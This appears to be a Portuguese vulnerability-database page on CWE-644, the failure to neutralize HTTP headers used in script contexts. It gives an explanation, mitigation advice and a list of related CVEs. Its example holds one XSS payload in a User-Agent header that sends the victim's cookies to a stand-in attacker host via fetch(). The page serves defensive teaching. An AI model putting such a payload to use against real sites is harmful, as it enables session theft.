Falhas do tipo CWE-644

64 resultados

Neutralização inadequada de cabeçalhos HTTP para sintaxe de script

A aplicação não sanitiza adequadamente cabeçalhos HTTP antes de usá-los em contextos que permitem execução de script (como JavaScript em páginas HTML). Um atacante injeta código malicioso em cabeçalhos como User-Agent ou Referer, que é refletido na resposta sem filtro, resultando em XSS (Cross-Site Scripting). O perigo: roubo de sessão, redirecionamento para phishing, ou comprometimento da conta do usuário.

Exemplo

Um servidor reflete o cabeçalho User-Agent diretamente em uma página de log ou diagnóstico sem escapar caracteres especiais. Um atacante envia `User-Agent: <img src=x onerror="fetch('https://atacante.com/steal?cookie='+document.cookie)">` e quando a página é acessada, o script executa e exfiltra cookies da vítima.

Como mitigar

Sempre escapar ou sanitizar dados de cabeçalhos HTTP antes de incluí-los em respostas HTML. Use encoding apropriado (HTML entity encoding), implementar Content-Security-Policy para bloquear scripts inline, e validar entrada de forma rigorosa. Ferramentas como OWASP ESAPI ou bibliotecas nativas de sanitização reduzem o risco significativamente.

CVE-2024-51454MEDIUMIBM Engineering Lifecycle Management - Engineering Workflow Management is impacted by vulnerabilities Host Header Injection observedEPSS 0.3%CVE-2025-24339MEDIUMA vulnerability in the web application of ctrlX OS allows a remote unauthenticated attacker to conduct various attacks against users of the EPSS 0.3%CVE-2025-23191LOWCache Poisoning through header manipulation vulnerability in SAP Fiori for SAP ERPEPSS 0.2%CVE-2025-27632MEDIUMA Host Header Injection vulnerability in TRMTracker application may allow an attacker by modifying the host header value in an HTTP request EPSS 0.2%CVE-2026-72574MEDIUMpicocms Pico - Host Header Injection Enables Script Source HijackingEPSS 0.2%CVE-2025-67724MEDIUMTornado vulnerable to Header Injection and XSS via reason argumentEPSS 0.2%CVE-2026-66778MEDIUMMultiple vulnerabilities in SAP Business AI Platform (Approuter)EPSS 0.2%CVE-2023-35894MEDIUMIBM Control Center HOST header injectionEPSS 0.2%CVE-2022-43847MEDIUMIBM Aspera Console HTTP header injectionEPSS 0.2%CVE-2024-51451MEDIUMMultiple Vulnerabilities in IBM Concert SoftwareEPSS 0.2%CVE-2025-14807MEDIUMIBM InfoSphere Information Server is vulnerable to HTTP header injectionEPSS 0.2%CVE-2025-40631LOWHTTP host header injection vulnerability in IceWarp Mail ServerEPSS 0.2%CVE-2025-36227MEDIUMMultiple vulnerabilities in IBM Aspera FaspexEPSS 0.2%CVE-2026-1698MEDIUMHTTP Host header vulnerability in WebClient and WebScheduler web appsEPSS 0.2%CVE-2026-0516MEDIUMA improper neutralization of HTTP Headers for Scripting Syntax vulnerability in SonicOS could allow a remote attacker to manipulate the HostEPSS 0.2%CVE-2025-66485MEDIUMMultiple vulnerabilities have been addressed in IBM Aspera SharesEPSS 0.2%CVE-2025-52647MEDIUMHCL BigFix WebUI is affected by a host header poisoning vulnerabilityEPSS 0.2%CVE-2024-40686MEDIUMIBM SmartCloud Analytics - Log Analysis HOST header injectionEPSS 0.2%CVE-2025-27901MEDIUMMultiple vulnerabilities in IBM Java SDK affecting Db2 Recovery Expert for Linux, Unix and WindowsEPSS 0.2%CVE-2026-21762LOWMissing HTTP Security Headers in DevOps LoopEPSS 0.2%